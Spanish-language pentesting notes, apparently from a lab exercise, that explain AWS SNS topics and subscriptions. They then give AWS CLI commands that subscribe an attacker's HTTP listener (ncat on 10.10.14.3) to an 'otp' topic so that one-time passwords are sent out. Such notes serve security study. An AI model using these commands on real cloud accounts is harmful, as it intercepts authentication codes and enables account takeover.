Pentesting SNS

El mensaje se envía a múltiples destinatarios instantáneamente (PUSH)

A. El Tópico (Topic)

Es un "canal" lógico de comunicación. Actúa como un punto de acceso.

• No puedes enviar un mensaje "a la nada"; debes enviarlo a un Tópico específico (por ejemplo, un tópico llamado Alertas-Sistema).

B. El Publicador (Publisher)

Es quien envía el mensaje al tópico.

• Puede ser una aplicación tuya, una función Lambda, o incluso otros servicios de AWS (como CloudWatch cuando salta una alarma).

C. El Suscriptor (Subscriber)

Es quien "escucha" el tópico. Cuando llega un mensaje al tópico, SNS se encarga de empujarlo (push) inmediatamente a todos los suscriptores.

• Los suscriptores pueden ser diversos: colas SQS, funciones Lambda, servidores HTTP, o personas (vía Email o SMS).

Listar topics

aws sns list-topics --endpoint-url http://cloud.amzcorp.local

Redirigir topic a servidor http

aws sns subscribe --protocol http --notification-endpoint http://10.10.14.3:8080/ --topic-arn 'arn:aws:sns:us-east-1:000000000000:otp' --endpoint-url http://cloud.amzcorp.local

ncat -lvnp 8080

Publicar mensaje

aws sns publish \
    --topic-arn "arn:aws:sns:us-east-1:000000000000:otp" \
    --message "Dato confidencial o prueba" \
    --endpoint-url http://cloud.amzcorp.local